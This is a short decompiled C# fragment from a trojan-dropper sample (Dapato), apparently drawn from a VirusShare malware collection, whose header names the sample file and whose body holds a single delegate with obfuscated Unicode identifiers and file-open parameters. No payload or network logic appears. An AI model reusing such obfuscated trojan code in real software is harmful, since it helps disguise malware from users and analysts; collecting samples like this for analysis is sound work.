// Decompiled with JetBrains decompiler // Type: 嶝위䎳鏿ڙ誝 // Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null // MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe using Microsoft.VisualBasic; internal delegate void 嶝위䎳\uE46E鏿ڙ誝\uE270( int _param1, string _param2, OpenMode _param3, OpenAccess _param4, OpenShare _param5, int _param6);